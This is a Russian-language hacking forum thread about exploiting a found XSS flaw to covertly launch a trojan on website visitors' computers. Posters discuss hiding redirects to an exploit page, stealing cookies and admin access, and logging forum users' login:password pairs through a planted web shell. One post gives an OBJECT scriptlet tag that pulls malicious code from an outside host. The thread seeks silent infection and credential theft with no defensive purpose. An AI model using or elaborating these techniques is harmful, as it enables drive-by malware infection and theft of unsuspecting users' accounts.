Допустим, на сайте найдена XSS. Как воспользоваться ею, чтоб запустить трояна на компьютерах посетителей НЕЗАМЕТНО? Т.е. чтоб не открывалось дополнительных окон в окне браузера при работе XSS и чтоб не было видно переход на сайт, где есть страница-эксплоит, при посещении которой стартует троян?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Ссылка по теме (статья не о реализации, а скорее всего просто описывается подобная ситуация в действии) Тут собственно через xss ты трояна врятли зальешь другое дело получить доступ к админ панели и править страничку (в статье описанна связка приват эксплойт+форм граббер) к сожалению паблик эксплойты не всегда работают, да и обычные трояны палятся всем чем можно)
У меня тоже вопрос
Можно ли поправить страничку форума так, что бы связка логин:пароль логировалась в отдельный файл? (на сервере форума имеется веб шел)
SecurityLameR пишет: собственно через xss ты трояна врятли зальешьдругое дело получить доступ к админ панели и править страничку
Стырить куки - это дело нехитрое. А меня интересует именно удалённый запуск файла.
Не стоит ограничивать свои познания только журналом Хакер. Есть намного более интересные и не "зажёванные" статьи. Вот, например
И через xss это вполне можно сделать: через javsscript можно отправить юзера на другой сайт? Можно! А на том сайте можно расположить html-эксплоит для браузера? Можно! Так что в этом вопрос не стоит. Вопрос лишь в реализации: интересует как можно незаметно заставить браузер загружать код страницы с эксплоитом. Чтоб никаких:
Код
window.open
и
Код
location.href
Можно, конечно всё-таки window.open использовать и задать координаты окна за пределами рабочего стола... но это не выход
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.ctudentishe.com/test.html"> </OBJECT> тут указана url странички на которой может находиться опасный код
кто еще какие способы знает внедрения трояна через xss стучите в асю 5745002 буду оч блогодарен за любое содействие